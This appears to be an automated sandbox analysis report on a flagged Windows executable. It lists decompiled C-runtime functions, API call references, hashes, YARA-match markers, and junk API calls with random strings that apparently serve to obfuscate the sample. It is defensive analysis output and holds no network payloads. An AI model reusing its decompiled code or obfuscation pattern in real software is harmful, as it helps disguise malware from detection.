                                                                                      • DeactivateActCtx.KERNEL32(00000000,00000000), ref: 004019DA
                                                                                      • ReadConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 004019EE
                                                                                      • SetConsoleTitleW.KERNEL32(mumefere pavegurovi), ref: 004019F9
                                                                                      • CopyFileW.KERNEL32(yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim,miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip,00000000), ref: 00401A0A
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00401A19
                                                                                      • SetConsoleTitleA.KERNEL32(kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi), ref: 00401A24
                                                                                      • BeginUpdateResourceW.KERNEL32 ref: 00401A2C
                                                                                      • FreeConsole.KERNEL32 ref: 00401A32
                                                                                      • SetEnvironmentVariableA.KERNEL32(darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut,cehiwah manamuxezexemuwetesaxuzaduzawor), ref: 00401A42
                                                                                      • SetConsoleWindowInfo.KERNEL32(00000000,00000000,00000000), ref: 00401A4B
                                                                                      • EndUpdateResourceA.KERNEL32 ref: 00401A53
                                                                                      Strings
                                                                                      • cehiwah manamuxezexemuwetesaxuzaduzawor, xrefs: 00401A38
                                                                                      • yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim, xrefs: 00401A05
                                                                                      • darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut, xrefs: 00401A3D
                                                                                      • miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip, xrefs: 00401A00
                                                                                      • mumefere pavegurovi, xrefs: 004019F4
                                                                                      • kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi, xrefs: 00401A1F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Console$EnvironmentFileResourceTitleUpdate$BeginCopyDeactivateFreeInfoModuleNameReadStringsVariableWindow
                                                                                      • String ID: cehiwah manamuxezexemuwetesaxuzaduzawor$darujuwihunuyun zabebedidez zizofokajitaxipogejipubowexo gifitutatopumiduc deguvofagebifut$kuhidukefub wijobijawimusago zalewijofuhuxukuyepanujonus gohabiraposekenapogakafete calaluneyukuwaxetoyumafotamobi$miwipufurudugiciyumenuzujifuhuvutedizocuditejeyimitip$mumefere pavegurovi$yojepajumoninoxugevotecokuyabapesuwayidamewakejivumatuturoguxowofukojurirotuyumiwim
                                                                                      • API String ID: 1369361980-2361986252
                                                                                      • Opcode ID: 1c68e81394502959ea048a51dd9680f3b731cc7d1b60ad2155ccdd28c7028877
                                                                                      • Instruction ID: 6e208b578b296d1895d65409d91f6f58629e917ce2b34d303741641d72c6da78
                                                                                      • Opcode Fuzzy Hash: 1c68e81394502959ea048a51dd9680f3b731cc7d1b60ad2155ccdd28c7028877
                                                                                      • Instruction Fuzzy Hash: 97116AB320A524FBC3206BA4AD4CD9F3F6CEF4B7517000126F606D2160DA784A01CBBD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040367F, Relevance: 18.1, APIs: 12, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040367F(short* _a4, int _a8, intOrPtr _a12, char* _a16, char _a20) {
				void* __edi;
				void* __esi;
				char _t35;
				int _t36;
				char _t37;
				char _t40;
				signed int _t46;
				void* _t48;
				void* _t49;
				char _t54;
				void* _t56;
				void* _t60;
				char _t63;
				signed short* _t64;
				short* _t66;
				char _t67;
				void* _t78;
				char* _t79;
				void* _t80;
				char _t81;
				char* _t82;

				_t79 = _a8;
				if(_t79 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t79 != 0) {
						_t35 = _a20;
						__eflags = _t35;
						if(__eflags != 0) {
							_t81 =  *_t35;
							_t36 =  *((intOrPtr*)(_t35 + 4));
						} else {
							_t81 =  *(E00404B55(_t78, _t79, _t80, __eflags) + 8);
							_t36 = E00404B2F(_t78, _t79, _t81, __eflags);
						}
						_a8 = _t36;
						__eflags = _t81;
						if(_t81 != 0) {
							_t37 = E00403591(_a8);
							_t82 = _a16;
							__eflags =  *_t82;
							_t67 = _t37;
							if( *_t82 == 0) {
								__eflags = _t67;
								if(__eflags != 0) {
									_t40 =  *( *((intOrPtr*)(_t67 + 4)) + ( *_t79 & 0x000000ff) + 0x1d) & 4;
									__eflags = _t40;
								} else {
									_t40 =  *(E004067D8(_t78, _t79, _t82, __eflags) + ( *_t79 & 0x000000ff) * 2) & 0x8000;
								}
								__eflags = _t40;
								if(_t40 == 0) {
									__eflags = _a4;
									__eflags = MultiByteToWideChar(_a8, 9, _t79, 1, _a4, 0 | _a4 != 0x00000000);
									if(__eflags != 0) {
										goto L13;
									}
									goto L20;
								} else {
									_t48 = E00404B13(_t78, _t79, _t82, _t67);
									__eflags = _a12 - _t48;
									if(_a12 >= _t48) {
										_t49 = E00404B13(_t78, _t79, _t82, _t67);
										__eflags = _t49 - 1;
										if(_t49 <= 1) {
											L29:
											__eflags = _t79[1];
											if(_t79[1] != 0) {
												L18:
												return E00404B13(_t78, _t79, _t82, _t67);
											}
											L19:
											 *_t82 =  *_t82 & 0x00000000;
											__eflags =  *_t82;
											L20:
											_t46 = E004046FF(__eflags);
											 *_t46 = 0x2a;
											return _t46 | 0xffffffff;
										}
										__eflags = _a4;
										_t54 = MultiByteToWideChar(_a8, 9, _t79, E00404B13(_t78, _t79, _t82, _t67), _a4, 0 | _a4 != 0x00000000);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L18;
										}
										goto L29;
									}
									 *_t82 =  *_t79;
									_t56 = 0xfffffffe;
									return _t56;
								}
							}
							_t82[1] =  *_t79;
							_t60 = E00404B13(_t78, _t79, _t82, _t67);
							__eflags = _t60 - 1;
							if(_t60 <= 1) {
								goto L19;
							}
							__eflags = _a4;
							_t63 = MultiByteToWideChar(_a8, 9, _t82, 2, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t63;
							if(_t63 == 0) {
								goto L19;
							}
							 *_t82 =  *_t82 & 0x00000000;
							__eflags =  *_t82;
							goto L18;
						} else {
							_t64 = _a4;
							__eflags = _t64;
							if(_t64 != 0) {
								 *_t64 =  *_t79 & 0x000000ff;
							}
							L13:
							return 1;
						}
					} else {
						_t66 = _a4;
						if(_t66 != 0) {
							 *_t66 = 0;
						}
						goto L5;
					}
				}
			}
























                                                                                      0x00403687
                                                                                      0x0040368c
                                                                                      0x004036a5
                                                                                      0x00000000
                                                                                      0x00403694
                                                                                      0x00403697
                                                                                      0x004036ac
                                                                                      0x004036af
                                                                                      0x004036b1
                                                                                      0x004036c2
                                                                                      0x004036c4
                                                                                      0x004036b3
                                                                                      0x004036b8
                                                                                      0x004036bb
                                                                                      0x004036bb
                                                                                      0x004036c7
                                                                                      0x004036ca
                                                                                      0x004036cc
                                                                                      0x004036e4
                                                                                      0x004036e9
                                                                                      0x004036ec
                                                                                      0x004036f0
                                                                                      0x004036f2
                                                                                      0x00403748
                                                                                      0x0040374a
                                                                                      0x0040376a
                                                                                      0x0040376a
                                                                                      0x0040374c
                                                                                      0x00403758
                                                                                      0x00403758
                                                                                      0x0040376d
                                                                                      0x0040376f
                                                                                      0x004037ce
                                                                                      0x004037e6
                                                                                      0x004037e8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403771
                                                                                      0x00403772
                                                                                      0x00403778
                                                                                      0x0040377b
                                                                                      0x0040378a
                                                                                      0x0040378f
                                                                                      0x00403793
                                                                                      0x004037bd
                                                                                      0x004037bd
                                                                                      0x004037c1
                                                                                      0x00403726
                                                                                      0x00000000
                                                                                      0x0040372c
                                                                                      0x00403732
                                                                                      0x00403732
                                                                                      0x00403732
                                                                                      0x00403735
                                                                                      0x00403735
                                                                                      0x0040373a
                                                                                      0x00000000
                                                                                      0x00403740
                                                                                      0x00403797
                                                                                      0x004037af
                                                                                      0x004037b5
                                                                                      0x004037b7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004037b7
                                                                                      0x00403781
                                                                                      0x00403783
                                                                                      0x00000000
                                                                                      0x00403783
                                                                                      0x0040376f
                                                                                      0x004036f7
                                                                                      0x004036fa
                                                                                      0x004036ff
                                                                                      0x00403703
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403707
                                                                                      0x00403719
                                                                                      0x0040371f
                                                                                      0x00403721
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403723
                                                                                      0x00403723
                                                                                      0x00000000
                                                                                      0x004036ce
                                                                                      0x004036ce
                                                                                      0x004036d1
                                                                                      0x004036d3
                                                                                      0x004036d9
                                                                                      0x004036d9
                                                                                      0x004036dc
                                                                                      0x00000000
                                                                                      0x004036de
                                                                                      0x00403699
                                                                                      0x00403699
                                                                                      0x0040369e
                                                                                      0x004036a2
                                                                                      0x004036a2
                                                                                      0x00000000
                                                                                      0x0040369e
                                                                                      0x00403697

                                                                                      APIs
                                                                                      • ____lc_handle_func.LIBCMT ref: 004036B3
                                                                                      • ____lc_codepage_func.LIBCMT ref: 004036BB
                                                                                      • __GetLocaleForCP.LIBCPMT ref: 004036E4
                                                                                      • ____mb_cur_max_l_func.LIBCMT ref: 004036FA
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,00000000,00000000,?,?,?,?,0040150C,?,00000000,00000001,00000000), ref: 00403719
                                                                                      • ____mb_cur_max_l_func.LIBCMT ref: 00403727
                                                                                      • ___pctype_func.LIBCMT ref: 0040374C
                                                                                      • ____mb_cur_max_l_func.LIBCMT ref: 00403772
                                                                                      • ____mb_cur_max_l_func.LIBCMT ref: 0040378A
                                                                                      • ____mb_cur_max_l_func.LIBCMT ref: 004037A2
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,00000000,?,?,?,?,0040150C,?,00000000,00000001,00000000), ref: 004037AF
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,?,0040150C,?,00000000,00000001,00000000), ref: 004037E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ____mb_cur_max_l_func$ByteCharMultiWide$Locale____lc_codepage_func____lc_handle_func___pctype_func
                                                                                      • String ID:
                                                                                      • API String ID: 3819326198-0
                                                                                      • Opcode ID: bc94c71d8c355d7ecd8b4f29cd2be4feeb68a8d9ec85e0561b8b2979178fd18b
                                                                                      • Instruction ID: 1c910f71532857991ef8d43e2eba7a8eaac3bfd14d9f113ff2bc86205083895e
                                                                                      • Opcode Fuzzy Hash: bc94c71d8c355d7ecd8b4f29cd2be4feeb68a8d9ec85e0561b8b2979178fd18b
                                                                                      • Instruction Fuzzy Hash: 7B41E4B1204245BEDB305F21C840B2A3FACAF41316F14883BF955AB2D2E73DDA50DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00851960, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 65388428-3277548187
                                                                                      • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction ID: a116ad4e80f652eaacba670b24988de1a284e6d7724a0721b1b57481c0645cd3
                                                                                      • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                      • Instruction Fuzzy Hash: A9515A71D40219ABDF11DBA5DC8AFEFBBB8FB04B45F100025F905F6181E774AA058BA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00863F16, Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00863F51
                                                                                        • Part of subcall function 00865BA8: __getptd_noexit.LIBCMT ref: 00865BA8
                                                                                      • __gmtime64_s.LIBCMT ref: 00863FEA
                                                                                      • __gmtime64_s.LIBCMT ref: 00864020
                                                                                      • __gmtime64_s.LIBCMT ref: 0086403D
                                                                                      • __allrem.LIBCMT ref: 00864093
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640AF
                                                                                      • __allrem.LIBCMT ref: 008640C6
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640E4
                                                                                      • __allrem.LIBCMT ref: 008640FB
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00864119
                                                                                      • __invoke_watson.LIBCMT ref: 0086418A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                      • String ID:
                                                                                      • API String ID: 384356119-0
                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction ID: c8f0d68c9134b25fad432afd37a9fed9016bdb7688d1ccb1124e84cc128cba20
                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                      • Instruction Fuzzy Hash: 8C71C672A00B16ABE7149E7DCC41B6EB3B9FF11364F158229F514E7682EB70DE408B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008684AB, Relevance: 16.6, APIs: 11, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$ExitProcess___crt
                                                                                      • String ID:
                                                                                      • API String ID: 1022109855-0
                                                                                      • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction ID: 7602314aee898abf9e92d21bdf67ce6e32cd6f313753b4a6e017384ab395464c
                                                                                      • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                      • Instruction Fuzzy Hash: CB318431900260DBCF616F58FC8D84977A4FB5432070A862AF91ADB2B1CFB45DC99F95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0088FC0C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC1F
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC34
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC4D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC62
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0088FC74
                                                                                        • Part of subcall function 0088F914: std::exception::exception.LIBCMT ref: 0088F92E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC82
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC9B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FCB0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                      • String ID: leM
                                                                                      • API String ID: 2862078307-2926266777
                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction ID: 72d2a0c9796463da3b5ac2e4e04cf277196311f2b76936a0db236e888b9207ff
                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                      • Instruction Fuzzy Hash: 78119979C0020DBBCF00FFA9D859CDDBB78FA14744B40C566B92897646EB74E3488B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040621F, Relevance: 15.1, APIs: 10, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 83%
                                                                                      			E0040621F(void* __ebx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t17;
				void* _t43;
				intOrPtr* _t51;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t51 = E0040673E(8, 1);
					_t57 = _t51;
					if(_t51 != 0) {
						_t13 = E0040673E(0xd8, 1);
						 *_t51 = _t13;
						__eflags = _t13;
						if(__eflags != 0) {
							_t14 = E0040673E(0x220, 1);
							 *((intOrPtr*)(_t51 + 4)) = _t14;
							__eflags = _t14;
							if(__eflags != 0) {
								E0040558F( *_t51, 0x4adca8);
								_t48 =  *_t51;
								_t17 = E00406004(_a8,  *_t51, _a4);
								_pop(_t43);
								__eflags = _t17;
								if(__eflags != 0) {
									__eflags = E00409EEB(_t43, _t48, __eflags,  *((intOrPtr*)( *_t51 + 4)),  *((intOrPtr*)(_t51 + 4)));
									if(__eflags == 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)))) = 1;
										L17:
										return _t51;
									}
									_push( *((intOrPtr*)(_t51 + 4)));
									E00403B26(__ebx, 1, _t51, __eflags);
									E004054F6( *_t51);
									E0040531E( *_t51);
									_push(_t51);
									E00403B26(__ebx, 1, _t51, __eflags);
									L15:
									_t51 = 0;
									goto L17;
								}
								E004054F6( *_t51);
								E0040531E( *_t51);
								_push(_t51);
								E00403B26(__ebx, 1, _t51, __eflags);
								goto L15;
							}
							_push( *_t51);
							E00403B26(__ebx, 1, _t51, __eflags);
							_push(_t51);
							E00403B26(__ebx, 1, _t51, __eflags);
							L8:
							goto L3;
						}
						_push(_t51);
						E00403B26(__ebx, 1, _t51, __eflags);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E004046FF(_t57))) = 0xc;
					goto L4;
				}
			}











                                                                                      0x0040622a
                                                                                      0x00406250
                                                                                      0x00000000
                                                                                      0x00406232
                                                                                      0x0040623d
                                                                                      0x00406241
                                                                                      0x00406243
                                                                                      0x0040625c
                                                                                      0x00406263
                                                                                      0x00406265
                                                                                      0x00406267
                                                                                      0x00406278
                                                                                      0x0040627f
                                                                                      0x00406282
                                                                                      0x00406284
                                                                                      0x0040629d
                                                                                      0x004062a8
                                                                                      0x004062aa
                                                                                      0x004062af
                                                                                      0x004062b0
                                                                                      0x004062b2
                                                                                      0x004062dc
                                                                                      0x004062de
                                                                                      0x00406306
                                                                                      0x0040630b
                                                                                      0x0040630d
                                                                                      0x00000000
                                                                                      0x0040630d
                                                                                      0x004062e0
                                                                                      0x004062e3
                                                                                      0x004062ea
                                                                                      0x004062f1
                                                                                      0x004062f6
                                                                                      0x004062f7
                                                                                      0x004062ff
                                                                                      0x004062ff
                                                                                      0x00000000
                                                                                      0x004062ff
                                                                                      0x004062b6
                                                                                      0x004062bd
                                                                                      0x004062c2
                                                                                      0x004062c3
                                                                                      0x00000000
                                                                                      0x004062c8
                                                                                      0x00406286
                                                                                      0x00406288
                                                                                      0x0040628d
                                                                                      0x0040628e
                                                                                      0x0040626f
                                                                                      0x00000000
                                                                                      0x0040626f
                                                                                      0x00406269
                                                                                      0x0040626a
                                                                                      0x00000000
                                                                                      0x0040626a
                                                                                      0x00406245
                                                                                      0x0040624a
                                                                                      0x00000000
                                                                                      0x0040624a

                                                                                      APIs
                                                                                      • __calloc_crt.LIBCMT ref: 00406238
                                                                                        • Part of subcall function 0040673E: __calloc_impl.LIBCMT ref: 0040674F
                                                                                        • Part of subcall function 0040673E: Sleep.KERNEL32(00000000,00408C13,00000001,00000214), ref: 00406766
                                                                                      • __calloc_crt.LIBCMT ref: 0040625C
                                                                                      • __calloc_crt.LIBCMT ref: 00406278
                                                                                      • __copytlocinfo_nolock.LIBCMT ref: 0040629D
                                                                                      • __setlocale_nolock.LIBCMT ref: 004062AA
                                                                                      • ___removelocaleref.LIBCMT ref: 004062B6
                                                                                      • ___freetlocinfo.LIBCMT ref: 004062BD
                                                                                      • __setmbcp_nolock.LIBCMT ref: 004062D5
                                                                                      • ___removelocaleref.LIBCMT ref: 004062EA
                                                                                      • ___freetlocinfo.LIBCMT ref: 004062F1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 2969281212-0
                                                                                      • Opcode ID: 99ebfd3b9a8afe4d43bd39479b6be3d77510632868e91a45af5ba62b84b4e5fd
                                                                                      • Instruction ID: df51420e26ef1d63d49dce8e102a6bad4d036a5b691a5c77db06d49c7349e125
                                                                                      • Opcode Fuzzy Hash: 99ebfd3b9a8afe4d43bd39479b6be3d77510632868e91a45af5ba62b84b4e5fd
                                                                                      • Instruction Fuzzy Hash: 7A210631104501AAE7317F2AD802E1B7BE5DF81768B22403FF886762D2DE399920DA5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084F010, Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3721157643-0
                                                                                      • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction ID: e9a2529090696fa79b9b25889019aebb5e30cc8d7726f2b61091c70792384831
                                                                                      • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction Fuzzy Hash: 6A113AB65009643AC661A3B94C16FFF7BDCEF85702F0800BAFB5DD5183DA185A0493B2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084F210, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 50152bc14c2b8763035f6ca3dc8670079f38d6a838e941eea9ad3b3647c5d508
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: ED515CB194020DAADF11DFA5DC46FEEBB78FB04704F104039FA05F6282D7B5AA058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084F440, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: 5f85adee2abf1f7ed6b311cb6fe5f54fd0ca8f2245ac811ad32d30910d10edca
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction Fuzzy Hash: DC518E71D40209AADF11DFA5CC46FEFBBB8FB04704F100039FA15F6181EA74AA058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402BBD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 97%
                                                                                      			E00402BBD(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t28;
				void* _t37;
				signed int _t41;
				intOrPtr _t47;
				void* _t57;
				intOrPtr* _t59;
				signed int _t63;
				intOrPtr _t64;
				void* _t66;
				signed int _t71;
				signed int _t72;

				_t57 = __edx;
				E004A6CC8(E004A6EFE, _t66);
				_t59 = __ecx;
				E00403200(_t66 - 0x18, 0);
				 *(_t66 - 4) = 0;
				 *((intOrPtr*)(_t66 - 0x10)) =  *0x4b838c;
				_t71 =  *0x4af658; // 0x0
				if(_t71 != 0) {
					L4:
					_t63 =  *0x4af658; // 0x0
					_t28 =  *_t59;
					if(_t63 >=  *((intOrPtr*)(_t28 + 0xc))) {
						_t47 = 0;
					} else {
						_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)) + _t63 * 4));
					}
					if(_t47 != 0 ||  *((intOrPtr*)(_t28 + 0x14)) == 0) {
						_t64 = _t47;
					} else {
						_t37 = E00402EDE();
						if(_t63 >=  *((intOrPtr*)(_t37 + 0xc))) {
							_t64 = 0;
						} else {
							_t64 =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 8)) + _t63 * 4));
						}
					}
					if(_t64 == 0) {
						_t64 =  *((intOrPtr*)(_t66 - 0x10));
						if(_t64 == 0) {
							_push(_t59);
							if(E004012EB(0, _t57, _t66 - 0x10) == 0xffffffff) {
								E00403A98(_t66 - 0x24, "bad cast");
								E004052D2(_t66 - 0x24, 0x4abbc8);
							}
							_t64 =  *((intOrPtr*)(_t66 - 0x10));
							 *0x4b838c = _t64;
							E004011D6(_t64);
							E00402FA3(_t57, _t64);
						}
					}
					 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
					E00403228(_t66 - 0x18);
					 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
					return _t64;
				}
				E00403200(_t66 - 0x14, 0);
				_t72 =  *0x4af658; // 0x0
				if(_t72 == 0) {
					 *0x4af64c =  *0x4af64c + 1;
					_t41 =  *0x4af64c; // 0x0
					 *0x4af658 = _t41;
				}
				E00403228(_t66 - 0x14);
				goto L4;
			}
















                                                                                      0x00402bbd
                                                                                      0x00402bc2
                                                                                      0x00402bcd
                                                                                      0x00402bd5
